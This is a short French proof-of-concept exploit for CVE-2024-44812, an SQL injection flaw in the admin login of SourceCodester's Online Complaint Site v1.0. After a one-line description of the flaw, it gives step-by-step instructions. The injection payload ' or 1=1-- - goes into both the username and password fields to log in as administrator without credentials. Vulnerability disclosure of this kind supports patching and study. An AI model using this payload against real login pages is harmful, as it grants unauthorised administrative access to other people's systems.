
Exploit de preuve de concept pour CVE-2024-44812 - Vulnérabilité d'injection SQL contournant l'authentification dans Online Complaint Site v1.0
SourceCodester
https://www.sourcecodester.com/php/14717/online-complaint-site-using-phpmysqli-full-source-code.html
Vulnérabilité d'injection SQL dans Online Complaint Site v.1.0 permet à un attaquant distant d'élever ses privilèges via les paramètres de nom d'utilisateur et de mot de passe dans le composant /admin.index.php.
Exploit de preuve de concept pour CVE-2024-44812 - Vulnérabilité de contournement d'authentification par injection SQL dans Online Complaint Site v1.0
Étape 1 – Rendez-vous sur http://localhost/complaintsite/
Étape 2 – Cliquez sur le bouton « admin » et redirigez vers la page de connexion.
Étape 3 – Entrez le nom d'utilisateur : ' or 1=1-- - et le mot de passe : ' or 1=1-- -
Étape 4 – Cliquez sur Connexion et vous serez maintenant connecté en tant qu'administrateur.